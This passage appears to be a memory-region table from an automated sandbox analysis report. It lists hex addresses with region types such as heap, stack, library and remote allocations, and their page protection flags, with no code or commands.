heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6B70000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2052EF96000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
24666F8E000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library section
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
24667500000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB40000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1C9E2076000
|
heap
|
page read and write
|
||
1B3B2E57000
|
heap
|
page read and write
|
||
2052EF7D000
|
heap
|
page read and write
|
||
7FFEBC794000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
5720000
|
trusted library allocation
|
page read and write
|
||
A8C32FE000
|
stack
|
page read and write
|
||
1D3A67A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6712000
|
trusted library allocation
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
7FFEBC9B0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D39E02A000
|
trusted library allocation
|
page read and write
|
||
1C9E2054000
|
heap
|
page read and write
|
||
1C9E3DD9000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1C9E3F1F000
|
heap
|
page read and write
|
||
1D3A62C0000
|
trusted library allocation
|
page read and write
|
||
B98E27F000
|
stack
|
page read and write
|
||
24667479000
|
trusted library allocation
|
page read and write
|
||
2052EF9B000
|
heap
|
page read and write
|
||
1CA585BD000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D9A0117000
|
direct allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
6120000
|
trusted library allocation
|
page read and write
|
||
1B3B49B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
2464FD98000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2052EF93000
|
heap
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
5F40000
|
trusted library allocation
|
page read and write
|
||
2521A049000
|
heap
|
page read and write
|
||
246678B0000
|
trusted library allocation
|
page read and write
|
||
24667060000
|
heap
|
page execute and read and write
|
||
2521AA02000
|
trusted library allocation
|
page read and write
|
||
1B3B4AAB000
|
trusted library allocation
|
page read and write
|
||
A8C3437000
|
stack
|
page read and write
|
||
1D9A15E4000
|
direct allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2521A024000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1D38E7DD000
|
trusted library allocation
|
page read and write
|
||
1CA57A4B000
|
heap
|
page read and write
|
||
1B3CCF1B000
|
heap
|
page read and write
|
||
2405A440000
|
trusted library allocation
|
page read and write
|
||
1C9E2063000
|
heap
|
page read and write
|
||
7FFEBC896000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A67C0000
|
trusted library allocation
|
page read and write
|
||
2052EF57000
|
heap
|
page read and write
|
||
1B3B49B0000
|
trusted library allocation
|
page read and write
|
||
1CA58A00000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1B3B58AF000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB30000
|
trusted library allocation
|
page read and write
|
||
E9A7FE000
|
stack
|
page read and write
|
||
1500000
|
trusted library allocation
|
page read and write
|
||
F73E2FF000
|
stack
|
page read and write
|
||
1D3A6890000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7BD000
|
trusted library allocation
|
page execute and read and write
|
||
B98DCFE000
|
stack
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
121AB354000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
12D4000
|
heap
|
page read and write
|
||
2521A04C000
|
heap
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
2521A048000
|
heap
|
page read and write
|
||
16F2A75000
|
stack
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1B3B2E6E000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1C9E3DA0000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2B019E49000
|
heap
|
page read and write
|
||
F73E0FE000
|
stack
|
page read and write
|
||
7FFEBCB90000
|
trusted library allocation
|
page read and write
|
||
33DE000
|
trusted library allocation
|
page read and write
|
||
1D39DED5000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAE0000
|
trusted library allocation
|
page read and write
|
||
24667890000
|
trusted library allocation
|
page read and write
|
||
7FFEBC980000
|
trusted library allocation
|
page execute and read and write
|
||
1C9E3EEF000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1B3B49C0000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
1C9E3F24000
|
heap
|
page read and write
|
||
15CB0A00000
|
heap
|
page read and write
|
||
24667830000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC50000
|
trusted library allocation
|
page read and write
|
||
24667900000
|
trusted library allocation
|
page read and write
|
||
121AB30B000
|
heap
|
page read and write
|
||
7FFEBC944000
|
trusted library allocation
|
page read and write
|
||
246674A2000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
1CA58564000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
A8C31FE000
|
stack
|
page read and write
|
||
1CA57900000
|
heap
|
page read and write
|
||
2464D0DC000
|
heap
|
page read and write
|
||
24667850000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D99E80B000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1B3B54A2000
|
trusted library allocation
|
page read and write
|
||
1B3B3085000
|
heap
|
page read and write
|
||
1D99E7C1000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
AB29978000
|
stack
|
page read and write
|
||
2E93000
|
trusted library allocation
|
page execute and read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB8B000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
2052EE50000
|
heap
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D99E7F3000
|
heap
|
page read and write
|
||
3277000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2938AB00000
|
heap
|
page read and write
|
||
7FFEBCA80000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2B019E8A000
|
heap
|
page read and write
|
||
1C9E3EF4000
|
heap
|
page read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1B3B4CF7000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
2052EFA1000
|
heap
|
page read and write
|
||
7FFEBC7C3000
|
trusted library allocation
|
page read and write
|
||
1C9E3DA1000
|
heap
|
page read and write
|
||
1C9E3FA1000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2F00000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
A8C33BE000
|
stack
|
page read and write
|
||
5867000
|
trusted library allocation
|
page read and write
|
||
1D99E7F3000
|
heap
|
page read and write
|
||
2052EF40000
|
heap
|
page read and write
|
||
1D3A67F0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1C9E2001000
|
heap
|
page read and write
|
||
24667150000
|
heap
|
page read and write
|
||
61D0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC90000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC952000
|
trusted library allocation
|
page read and write
|
||
1D3A6743000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC50000
|
trusted library allocation
|
page read and write
|
||
3130000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2464D089000
|
heap
|
page read and write
|
||
7FFEBCB88000
|
trusted library allocation
|
page read and write
|
||
13EB000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
46EBCFF000
|
stack
|
page read and write
|
||
1D99E7AD000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1C9E1FCA000
|
heap
|
page read and write
|
||
1D3A62C0000
|
trusted library allocation
|
page read and write
|
||
13A0000
|
trusted library allocation
|
page read and write
|
||
C4260FF000
|
stack
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
5F86000
|
trusted library allocation
|
page read and write
|
||
170BF886000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1B3B4990000
|
trusted library allocation
|
page read and write
|
||
2052EF75000
|
heap
|
page read and write
|
||
1D39DE21000
|
trusted library allocation
|
page read and write
|
||
1CA585A3000
|
heap
|
page read and write
|
||
2ED70D08000
|
heap
|
page read and write
|
||
1B3B4A00000
|
trusted library allocation
|
page read and write
|
||
1D3A6741000
|
trusted library allocation
|
page read and write
|
||
1D3A67E0000
|
trusted library allocation
|
page read and write
|
||
2EB0000
|
trusted library allocation
|
page read and write
|
||
1B3B2E91000
|
heap
|
page read and write
|
||
1D3A6AE0000
|
trusted library allocation
|
page read and write
|
||
1D3A6741000
|
trusted library allocation
|
page read and write
|
||
2521A013000
|
heap
|
page read and write
|
||
338A000
|
trusted library allocation
|
page read and write
|
||
15CB0A90000
|
heap
|
page read and write
|
||
7FFEBC860000
|
trusted library allocation
|
page read and write
|
||
46EBC7A000
|
stack
|
page read and write
|
||
2938AB02000
|
heap
|
page read and write
|
||
F50000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
7FFEBC84C000
|
trusted library allocation
|
page execute and read and write
|
||
1D38C3D3000
|
heap
|
page read and write
|
||
17F30695000
|
heap
|
page read and write
|
||
E805EFC000
|
stack
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1B3B5802000
|
trusted library allocation
|
page read and write
|
||
4091000
|
trusted library allocation
|
page read and write
|
||
A1A847E000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2521A081000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
469437E000
|
stack
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
16E0000
|
heap
|
page read and write
|
||
2464E9B0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB80000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1C9E3DA1000
|
heap
|
page read and write
|
||
1CA58595000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
20531DB4000
|
direct allocation
|
page read and write
|
||
2464F589000
|
trusted library allocation
|
page read and write
|
||
1B3B57AB000
|
trusted library allocation
|
page read and write
|
||
5E60000
|
trusted library allocation
|
page read and write
|
||
1C9E3FA0000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
5D0E000
|
stack
|
page read and write
|
||
170BF690000
|
heap
|
page read and write
|
||
33D8000
|
trusted library allocation
|
page read and write
|
||
46EBDF9000
|
stack
|
page read and write
|
||
7FFEBC941000
|
trusted library allocation
|
page read and write
|
||
24667080000
|
heap
|
page execute and read and write
|
||
1C9E3EB4000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D9A13A0000
|
direct allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
205308B0000
|
direct allocation
|
page read and write
|
||
20531B50000
|
direct allocation
|
page read and write
|
||
46EBD7E000
|
stack
|
page read and write
|
||
1CA58571000
|
heap
|
page read and write
|
||
24667477000
|
trusted library allocation
|
page read and write
|
||
2464D13A000
|
heap
|
page read and write
|
||
2B019F08000
|
heap
|
page read and write
|
||
1D3A68A0000
|
heap
|
page read and write
|
||
1CA58583000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1B3B2D60000
|
heap
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
E50000
|
heap
|
page read and write
|
||
7FFEBCB00000
|
trusted library allocation
|
page read and write
|
||
7FFEBC930000
|
trusted library allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1B3CD21D000
|
heap
|
page read and write
|
||
1CA58585000
|
heap
|
page read and write
|
||
1D3A6716000
|
trusted library allocation
|
page read and write
|
||
24667510000
|
trusted library allocation
|
page read and write
|
||
2052EFAC000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
246674A1000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
1B3B4CDF000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7A0000
|
trusted library allocation
|
page read and write
|
||
5E9E000
|
stack
|
page read and write
|
||
7FFEBCA60000
|
trusted library allocation
|
page read and write
|
||
1D3A6752000
|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
24667086000
|
heap
|
page execute and read and write
|
||
C425CF4000
|
stack
|
page read and write
|
||
1D99E7FC000
|
heap
|
page read and write
|
||
12FF000
|
heap
|
page read and write
|
||
7FFEBC8B0000
|
trusted library allocation
|
page execute and read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1C9E2057000
|
heap
|
page read and write
|
||
7FFEBCC10000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
6ABD000
|
stack
|
page read and write
|
||
68E13FE000
|
stack
|
page read and write
|
||
A1A84FE000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
24667860000
|
trusted library allocation
|
page read and write
|
||
1D99E7A6000
|
heap
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page read and write
|
||
2A7CE1B0000
|
heap
|
page read and write
|
||
1D3A6742000
|
trusted library allocation
|
page read and write
|
||
24667880000
|
trusted library allocation
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
A8C373C000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
17F303CE000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D9A146D000
|
direct allocation
|
page read and write
|
||
7FFEBC9A0000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1B3B2ECB000
|
heap
|
page read and write
|
||
24667057000
|
heap
|
page read and write
|
||
160B000
|
trusted library allocation
|
page execute and read and write
|
||
24667840000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667195000
|
heap
|
page read and write
|
||
170BF902000
|
heap
|
page read and write
|
||
2466704A000
|
heap
|
page read and write
|
||
1B3B4865000
|
heap
|
page read and write
|
||
1CA57B08000
|
heap
|
page read and write
|
||
1B3B4A10000
|
trusted library allocation
|
page read and write
|
||
1C9E3F28000
|
heap
|
page read and write
|
||
24667130000
|
trusted library allocation
|
page read and write
|
||
121AB320000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1C9E3E03000
|
heap
|
page read and write
|
||
5790000
|
trusted library allocation
|
page read and write
|
||
1C9E2018000
|
heap
|
page read and write
|
||
7FFEBC790000
|
trusted library allocation
|
page read and write
|
||
5B8E000
|
stack
|
page read and write
|
||
1D99E7A6000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1C9E3FC7000
|
heap
|
page read and write
|
||
172E000
|
stack
|
page read and write
|
||
5E60000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC20000
|
trusted library allocation
|
page read and write
|
||
1CA58584000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
2052EEE0000
|
heap
|
page read and write
|
||
1B3CCF69000
|
heap
|
page read and write
|
||
68E1C7F000
|
stack
|
page read and write
|
||
1CA57A89000
|
heap
|
page read and write
|
||
1CA58585000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
68E1BFF000
|
stack
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
139E000
|
stack
|
page read and write
|
||
2B019DD0000
|
trusted library allocation
|
page read and write
|
||
1D3A6741000
|
trusted library allocation
|
page read and write
|
||
1B3CCE67000
|
heap
|
page execute and read and write
|
||
1D38E7A7000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB95000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6979000
|
heap
|
page read and write
|
||
7FFEBCAF2000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1CA58597000
|
heap
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
1D38C38B000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
33AD000
|
trusted library allocation
|
page read and write
|
||
16F2B7E000
|
stack
|
page read and write
|
||
1C9E3F11000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
339B000
|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
1D9A0110000
|
direct allocation
|
page read and write
|
||
7FFEBC840000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1CA57970000
|
heap
|
page read and write
|
||
AB29C7F000
|
stack
|
page read and write
|
||
1B3B4A30000
|
heap
|
page read and write
|
||
205308B7000
|
direct allocation
|
page read and write
|
||
1515000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A67B0000
|
trusted library allocation
|
page read and write
|
||
16B0000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1CA58595000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1C9E3EB4000
|
heap
|
page read and write
|
||
1D3A6270000
|
heap
|
page execute and read and write
|
||
7FFEBCAD0000
|
trusted library allocation
|
page read and write
|
||
1D3A6880000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA40000
|
trusted library allocation
|
page read and write
|
||
1CA57A29000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
F73E27C000
|
stack
|
page read and write
|
||
1B3B58A3000
|
trusted library allocation
|
page read and write
|
||
1D3A6610000
|
heap
|
page read and write
|
||
2B019E82000
|
heap
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1D99E7F3000
|
heap
|
page read and write
|
||
2938AA3C000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2B019F00000
|
heap
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
7FFEBC961000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
24667820000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9D0000
|
trusted library allocation
|
page read and write
|
||
2052EF51000
|
heap
|
page read and write
|
||
2052EF51000
|
heap
|
page read and write
|
||
1CA58587000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2521A102000
|
heap
|
page read and write
|
||
1B3B2E16000
|
heap
|
page read and write
|
||
1CA57A00000
|
heap
|
page read and write
|
||
1C9E400E000
|
heap
|
page read and write
|
||
1D99E796000
|
heap
|
page read and write
|
||
4694279000
|
stack
|
page read and write
|
||
20531DB4000
|
direct allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
2A7CE2BB000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667500000
|
trusted library allocation
|
page read and write
|
||
68E1A77000
|
stack
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
A8C34B8000
|
stack
|
page read and write
|
||
2052EEE4000
|
heap
|
page read and write
|
||
2464D080000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2A7CE220000
|
heap
|
page read and write
|
||
1510000
|
heap
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
14F4000
|
trusted library allocation
|
page read and write
|
||
1270000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
AB29DFE000
|
unkown
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
2464EBB0000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
6BBD000
|
stack
|
page read and write
|
||
246674A3000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
246674F0000
|
trusted library allocation
|
page read and write
|
||
24667500000
|
trusted library allocation
|
page read and write
|
||
1CA58511000
|
heap
|
page read and write
|
||
A1A88F7000
|
stack
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
1D99E7A7000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
2466702E000
|
heap
|
page read and write
|
||
2052EFB7000
|
heap
|
page read and write
|
||
1D99E770000
|
heap
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
C4267FF000
|
stack
|
page read and write
|
||
1D3A6B90000
|
trusted library allocation
|
page read and write
|
||
1D3A631C000
|
heap
|
page read and write
|
||
7FFEBCA17000
|
trusted library allocation
|
page read and write
|
||
1C9E2052000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
2521A03C000
|
heap
|
page read and write
|
||
17F303A0000
|
heap
|
page read and write
|
||
2052EFA6000
|
heap
|
page read and write
|
||
246674F0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA10000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2ED70A50000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1CA58564000
|
heap
|
page read and write
|
||
1C9E1FB6000
|
heap
|
page read and write
|
||
2464D040000
|
heap
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
7FFEBCBA0000
|
trusted library allocation
|
page read and write
|
||
1D3A6B10000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBB0000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1CA58A03000
|
heap
|
page read and write
|
||
7FFEBCB10000
|
trusted library allocation
|
page read and write
|
||
D9EF0B000
|
stack
|
page read and write
|
||
542ADF6000
|
stack
|
page read and write
|
||
1D99E82C000
|
heap
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1B3B2DC0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1CA585A7000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1B3CCF69000
|
heap
|
page read and write
|
||
6E3D000
|
stack
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
2938AB08000
|
heap
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
A1A87FD000
|
stack
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
5872000
|
trusted library allocation
|
page read and write
|
||
2464EA90000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
339F000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1C9E203D000
|
heap
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
1D38C31D000
|
heap
|
page read and write
|
||
1B3B46D0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7C0000
|
trusted library allocation
|
page read and write
|
||
1D99E799000
|
heap
|
page read and write
|
||
170BF813000
|
heap
|
page read and write
|
||
7FFEBCB20000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1B3B4990000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
2052EF15000
|
heap
|
page read and write
|
||
1B3B5B6F000
|
trusted library allocation
|
page read and write
|
||
1C9E2054000
|
heap
|
page read and write
|
||
1B3B4980000
|
trusted library allocation
|
page read and write
|
||
24667477000
|
trusted library allocation
|
page read and write
|
||
1CA585A6000
|
heap
|
page read and write
|
||
D9F67E000
|
stack
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
4694479000
|
stack
|
page read and write
|
||
24667800000
|
trusted library allocation
|
page read and write
|
||
20531B90000
|
direct allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2052EFA4000
|
heap
|
page read and write
|
||
526E000
|
stack
|
page read and write
|
||
1C9E3EE1000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
2A7CE660000
|
heap
|
page read and write
|
||
7FFEBCA90000
|
trusted library allocation
|
page read and write
|
||
2052EE40000
|
remote allocation
|
page read and write
|
||
7FFEBC972000
|
trusted library allocation
|
page read and write
|
||
5A90000
|
remote allocation
|
page read and write
|
||
33BD000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6370000
|
heap
|
page read and write
|
||
20531C90000
|
direct allocation
|
page read and write
|
||
1B3B2E0C000
|
heap
|
page read and write
|
||
1D99E79A000
|
heap
|
page read and write
|
||
20531CD0000
|
direct allocation
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1D9A146D000
|
direct allocation
|
page read and write
|
||
1D99E764000
|
heap
|
page read and write
|
||
2052EFA6000
|
heap
|
page read and write
|
||
7FFEBC9E0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
7FFEBCB9B000
|
trusted library allocation
|
page read and write
|
||
2521A054000
|
heap
|
page read and write
|
||
1CA57A5B000
|
heap
|
page read and write
|
||
2052EF28000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
D9F57F000
|
stack
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
68E167D000
|
stack
|
page read and write
|
||
1D99E680000
|
remote allocation
|
page read and write
|
||
1C9E3F2C000
|
heap
|
page read and write
|
||
2B019E70000
|
heap
|
page read and write
|
||
2B019E55000
|
heap
|
page read and write
|
||
1CA57A4C000
|
heap
|
page read and write
|
||
4693EEC000
|
stack
|
page read and write
|
||
